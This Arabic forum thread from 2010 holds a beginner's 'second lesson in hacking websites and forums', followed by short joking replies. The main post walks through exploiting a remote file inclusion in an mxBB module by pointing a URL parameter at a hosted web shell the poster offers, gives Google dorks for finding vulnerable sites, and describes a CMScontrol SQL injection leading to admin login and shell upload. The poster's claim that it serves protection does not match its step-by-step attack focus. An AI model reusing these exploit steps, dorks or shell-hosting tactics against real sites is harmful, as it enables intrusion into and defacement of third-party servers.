شبكة السراب الثقافية

هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

شبكة ثقافية ادبية متنوعة وشاملة

المواضيع الأخيرة

» 05 نيسان عيد ميلاد اميرة دمشق
الدرس الثانى فى اختراق المواقع والمنتديات Empty6/8/2023, 9:34 pm من طرف روان علي شريف

» أنا بهذه اللحظة
الدرس الثانى فى اختراق المواقع والمنتديات Empty10/28/2021, 8:01 am من طرف جاك

» على الرصيف
الدرس الثانى فى اختراق المواقع والمنتديات Empty6/13/2020, 5:40 pm من طرف روان علي شريف

» بوابة الجحيم
الدرس الثانى فى اختراق المواقع والمنتديات Empty6/13/2020, 4:58 pm من طرف روان علي شريف

» الكاتب علي شريف روان في حوار لـ"الديوان"
الدرس الثانى فى اختراق المواقع والمنتديات Empty6/28/2019, 5:05 pm من طرف روان علي شريف

»  فردوس مليندا المفقود.
الدرس الثانى فى اختراق المواقع والمنتديات Empty3/12/2019, 1:20 am من طرف روان علي شريف

» بدري فركوح
الدرس الثانى فى اختراق المواقع والمنتديات Empty3/4/2019, 11:56 pm من طرف المهندس جورج فارس رباحية

» ليلى العفيفة
الدرس الثانى فى اختراق المواقع والمنتديات Empty3/4/2019, 11:52 pm من طرف المهندس جورج فارس رباحية

» مجموعة مؤلفات محمد حسنين هيكل
الدرس الثانى فى اختراق المواقع والمنتديات Empty1/27/2019, 3:42 pm من طرف نبيل اوزاعي

» ألفية العياط فى النحو
الدرس الثانى فى اختراق المواقع والمنتديات Empty11/9/2018, 3:13 am من طرف محمود العياط

» ديوان إنشق القمر
الدرس الثانى فى اختراق المواقع والمنتديات Empty8/14/2018, 2:05 am من طرف محمود العياط

»  ديوان بومبا والاقزام
الدرس الثانى فى اختراق المواقع والمنتديات Empty2/25/2018, 3:39 am من طرف محمود العياط

» بريد الموتى
الدرس الثانى فى اختراق المواقع والمنتديات Empty1/23/2018, 2:35 am من طرف روان علي شريف

» ديوان دحش قرم ودانك
الدرس الثانى فى اختراق المواقع والمنتديات Empty12/21/2017, 4:33 am من طرف محمود العياط

»  ديوان حادى يابادى يا كرنب زبادى
الدرس الثانى فى اختراق المواقع والمنتديات Empty10/14/2017, 6:21 am من طرف محمود العياط

» من عجائب الأرقام
الدرس الثانى فى اختراق المواقع والمنتديات Empty5/24/2017, 9:36 pm من طرف المهندس جورج فارس رباحية

» ابن الرومي
الدرس الثانى فى اختراق المواقع والمنتديات Empty5/24/2017, 9:20 pm من طرف المهندس جورج فارس رباحية

»  قصيدة حبك وقلبى
الدرس الثانى فى اختراق المواقع والمنتديات Empty8/13/2016, 11:05 pm من طرف محمود العياط

» الأعشى الأكبر
الدرس الثانى فى اختراق المواقع والمنتديات Empty6/11/2016, 4:17 pm من طرف المهندس جورج فارس رباحية

» مساء الخير
الدرس الثانى فى اختراق المواقع والمنتديات Empty5/2/2015, 8:40 am من طرف السراب

» مي زيادة
الدرس الثانى فى اختراق المواقع والمنتديات Empty4/22/2015, 11:17 am من طرف المهندس جورج فارس رباحية

» لبيد بن ربيعة
الدرس الثانى فى اختراق المواقع والمنتديات Empty12/28/2014, 4:44 pm من طرف المهندس جورج فارس رباحية

» زهير بن أبي سلمى
الدرس الثانى فى اختراق المواقع والمنتديات Empty12/20/2014, 4:32 am من طرف المهندس جورج فارس رباحية

» جبران خليل جبران
الدرس الثانى فى اختراق المواقع والمنتديات Empty12/5/2014, 2:16 pm من طرف المهندس جورج فارس رباحية

» إيايا أبو ماضي
الدرس الثانى فى اختراق المواقع والمنتديات Empty11/5/2014, 2:09 am من طرف المهندس جورج فارس رباحية

» حمل برنامح تعلم اللغة الانجليزيه على جهازك المحمول
الدرس الثانى فى اختراق المواقع والمنتديات Empty9/11/2014, 10:04 pm من طرف poopy87

» أوبريت ملحمة تحتمس الرابع ولوحة الاحلام
الدرس الثانى فى اختراق المواقع والمنتديات Empty7/28/2014, 9:41 am من طرف محمود العياط

»  سيف الفراق
الدرس الثانى فى اختراق المواقع والمنتديات Empty7/22/2014, 2:59 am من طرف محمود العياط

»  ديوان اعشقك جدا
الدرس الثانى فى اختراق المواقع والمنتديات Empty7/22/2014, 2:56 am من طرف محمود العياط

» ديوان الحديث مع النفس البشرية
الدرس الثانى فى اختراق المواقع والمنتديات Empty7/22/2014, 2:54 am من طرف محمود العياط

» عمرو بن كلثوم
الدرس الثانى فى اختراق المواقع والمنتديات Empty6/14/2014, 6:02 pm من طرف المهندس جورج فارس رباحية

» طرفة بن العبد
الدرس الثانى فى اختراق المواقع والمنتديات Empty5/28/2014, 5:26 am من طرف المهندس جورج فارس رباحية

»  ديوان رصاصة فى قلب الجياد العجوزة
الدرس الثانى فى اختراق المواقع والمنتديات Empty5/20/2014, 10:40 pm من طرف محمود العياط

» شهداء 6 أيار 1916
الدرس الثانى فى اختراق المواقع والمنتديات Empty5/6/2014, 5:45 pm من طرف المهندس جورج فارس رباحية

» الياس قنصل
الدرس الثانى فى اختراق المواقع والمنتديات Empty4/23/2014, 4:20 pm من طرف المهندس جورج فارس رباحية

» زكي قنصل
الدرس الثانى فى اختراق المواقع والمنتديات Empty4/23/2014, 4:18 pm من طرف المهندس جورج فارس رباحية

» فضائية الجزيرة إحدى أسلحة قطر
الدرس الثانى فى اختراق المواقع والمنتديات Empty4/3/2014, 6:05 pm من طرف طالب علي

» إضافة رائعة للفايرفوكس ( ميزة AutoPager ) تجعل كل المواضيع في صفحة واحدة
الدرس الثانى فى اختراق المواقع والمنتديات Empty4/2/2014, 4:47 pm من طرف العـدوي

» محمود درويش مؤلفات ودواوين
الدرس الثانى فى اختراق المواقع والمنتديات Empty3/20/2014, 9:56 pm من طرف wadfay

» حاتم الطائي
الدرس الثانى فى اختراق المواقع والمنتديات Empty3/20/2014, 6:35 pm من طرف المهندس جورج فارس رباحية

» حكمة اليوم
الدرس الثانى فى اختراق المواقع والمنتديات Empty3/2/2014, 6:03 pm من طرف المهندس جورج فارس رباحية

» امرؤ القيس
الدرس الثانى فى اختراق المواقع والمنتديات Empty3/2/2014, 5:55 pm من طرف المهندس جورج فارس رباحية

» محتويات مكتبة الروايات
الدرس الثانى فى اختراق المواقع والمنتديات Empty2/9/2014, 4:26 pm من طرف أريج الورد

» تقديم ديوان رصاصة فى قلب الجياد العجوزة محمود العياط
الدرس الثانى فى اختراق المواقع والمنتديات Empty2/1/2014, 8:33 pm من طرف محمود العياط

» الحارث بن حلزة
الدرس الثانى فى اختراق المواقع والمنتديات Empty1/21/2014, 7:36 pm من طرف المهندس جورج فارس رباحية

» مجموعة من الاغاني النادرة لكاظم الساهر تجدونها عند السراب فقط لا غير
الدرس الثانى فى اختراق المواقع والمنتديات Empty1/19/2014, 10:02 am من طرف mas12ter

» رخصة زواج للمؤجل اداريا
الدرس الثانى فى اختراق المواقع والمنتديات Empty1/8/2014, 9:17 am من طرف anas198510

» الف ليلة وليلة
الدرس الثانى فى اختراق المواقع والمنتديات Empty1/8/2014, 2:01 am من طرف سعيد خليف

» عنترة العبسي
الدرس الثانى فى اختراق المواقع والمنتديات Empty1/5/2014, 6:30 pm من طرف المهندس جورج فارس رباحية

» معجم المصطلحات النفسية انكليزي فرنسي عربي
الدرس الثانى فى اختراق المواقع والمنتديات Empty11/24/2013, 1:33 pm من طرف محمد حمد

شاطر

دخول

لقد نسيت كلمة السر

تدفق ال RSS


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 

2 مشترك

    الدرس الثانى فى اختراق المواقع والمنتديات

    جيفارا فلسطين
    جيفارا فلسطين
    مشرف عام
    مشرف عام


    ذكر
    عدد المشاركات : 1824
    عدد مرات الشكر : 155

    الدرس الثانى فى اختراق المواقع والمنتديات Empty الدرس الثانى فى اختراق المواقع والمنتديات

    مُساهمة من طرف جيفارا فلسطين 1/14/2010, 5:11 am

    السلام عليكم ورحمة الله وبركاته



    اليوم أقدم لكم الدرس الثانى حاولت أبسطه للمبتدئين

    يتضمن شرح

    استغلال 4 أنواع من الثغرات المهمة

    - File Include
    - Sql Injection
    - Upload
    - Local File Include

    ما هي أنواع الثغرات ..!

    الثغراات لاتعد ولا تحصى ودلك حسب أنواع الأنظمة مثلا نظام اللينكس أو ويندوز أو ماتريكس
    وهنا سنتطرق لثلاث أنواع أساسية في نظام الـ php لانها هي المعممة وهي



    1- File Include (ادراج ملف)


    ثغرات Remote File Inclusion Vulnerability هي الثغرات التي تسمح لنا بأدراج اكواد PHP على السرفر بكل اختصااار . وبما ان php لغة ديناميكية كما هو معروف فممكن الحاق تغييرات
    للسرفر عن طريق الاكواد هذه , اذن بمجرد تطبيق ثغرة Remote File Inclusion يكمننا اختراق السرفر (الحاق تغييرات للسرفر) .



    ممكن ايجاد هذه الثغرات في مواقع security المتعددة و سوف اشرح لكم 1 منهم وهو القلق
    [size=21]تمام الان نشوف الثغرة
    mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability

    طبعا هذة اسم السكربت المصاب ونوع الثغرة


    [size=21]Discovered by bd0rk || SOH-Crew
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    The german Coding and IT-Security Ressource
    وهذة المكتشف وموقعه وبيانات عنه طبعا مابلزمنا
    Vendor: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


    Download: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    طبعا هنا الموقع الرسمى لسكربت
    وصفحة تحميل السكربت لو بدك تنزله وتفحصه تتاكد
    Vulnerable Code in contrib/mx_glance_sdesc.php line 89
    مساء الخطأ فى أى مجلد وأى ملف
    include_once($mx_root_path . 'includes/mx_functions_tools.'.$phpEx);
    [size=21][b]الخطأ البرمجى الموجود


    [size=21][b]الان نيجى للمهم كثير

    [+]Exploit: /[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]]


    أنت لمن تشوف ثغرة دور على المهم الى هوى
    Exploit
    الى هوى الأستغلال


    الان نيجى لاستغلال نزبطه اكثر
    /[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    تبدله برابط الموقع المصاب
    /[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode][p4th]
    وهذة تبدله بمجلد السكربت المرفوع
    /[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode]contrib/mx_glance_sdesc.php?mx_root_path=
    وهذا الاستغلال
    /[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode][ShellCode]
    وهذة نشيله ونحط رابط شل بصيغة txt
    مثال انا رافع شل
    بامكانكم تستخدموه
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]?
    يعنى يصير الاستغلال جاهز
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]?
    ولا ننسى أخر الاستغلال نضع علامة ؟
    الا نيجى للبحث عن السكربت
    ممكن تكتب اسم السكربت بجوجل مع أضافة
    powered by ااسم السكربت
    powered by mxBB Module




    او نحط اخر شى من الاستغلال مع اضافة
    allinurl:
    allinurl: "mx_glance_sdesc.php?mx_root_path"


    الان نشوف معى موقع مصاب حطيت الاستغلال لهوى شبك معى الشل
    طبعا زى مانتوا عارفين
    Software: CMScontrol (Content Management Portal Solutions) Sql Injection
    أسم السكربت ونوع الثغرة


    Version: 7.*
    الاصدار السكربت المصاب
    Vulnerability: Remote Sql Injection
    نوع الثغرة
    Google Dork: "index.php?id_menu=" CMScontrol
    وهذا دورك البحث وهوى مهم جدا جدا
    Off. site: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    موقع السكربت
    #=Author========================================== ====#
    # Author: ph1l1ster #
    # Date: 20.09.2009 #
    # Contact: icq: 612672 | email: #

    معلومات عن المكتشف



    Exploit: طبعا هاى تدل على الاستغلال الى جمبها بكون الاستغلال على سريع
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


    Live demo: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    وهذا موقع مصاب وضعه المكتشف
    Login page: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    [b]وهذا مسار اللوحة لل السكربت يعنى لو وجدت موقع مصاب وطلعت اليوزر والباس تبعه تقدر تفوت اللوحة من خل هل مسار]
    وترفع شل منها بإذن الله
    medoo
    medoo
    سرابي مميز
    سرابي مميز


    ذكر
    عدد المشاركات : 217
    تاريخ الميلاد : 10/04/1991
    العمر : 33
    عدد مرات الشكر : 9

    الدرس الثانى فى اختراق المواقع والمنتديات Empty رد: الدرس الثانى فى اختراق المواقع والمنتديات

    مُساهمة من طرف medoo 1/14/2010, 11:28 am

    بكرا رح اتخرق النتدى الحقي يا سراب جيفارا رح يجبلنا لابلى تحياتي الك جيفار مع حبيبي والوقار
    جيفارا فلسطين
    جيفارا فلسطين
    مشرف عام
    مشرف عام


    ذكر
    عدد المشاركات : 1824
    عدد مرات الشكر : 155

    الدرس الثانى فى اختراق المواقع والمنتديات Empty رد: الدرس الثانى فى اختراق المواقع والمنتديات

    مُساهمة من طرف جيفارا فلسطين 1/14/2010, 2:21 pm

    ههههههههههههههههههههه ولله ضحكتني ياميدو
    اولا ياصديقي انا تايب من حوالي سنتين عن الهكر
    وكنت عضو ذهبي مسجل في منظمه الهكر العالميه
    ومعتزل هالموضوع بلا رجعه
    اما عن تنزيل هكذا دروس هي للحمايه اكثر مما تكون للقرصنه
    وانا واثق ممن يتقنون الهكر فقط هم الذين سوف يفهموا هذه الدروس
    ولله من وراء القصد تحياتي ياعسل
    medoo
    medoo
    سرابي مميز
    سرابي مميز


    ذكر
    عدد المشاركات : 217
    تاريخ الميلاد : 10/04/1991
    العمر : 33
    عدد مرات الشكر : 9

    الدرس الثانى فى اختراق المواقع والمنتديات Empty رد: الدرس الثانى فى اختراق المواقع والمنتديات

    مُساهمة من طرف medoo 1/15/2010, 6:10 am

    ههههههههههههههههههه اكيد انا مش رح افهم الدرس والحمد الله انك اعتزلت تحياتي يا غالي

      الوقت/التاريخ الآن هو 4/28/2024, 4:04 pm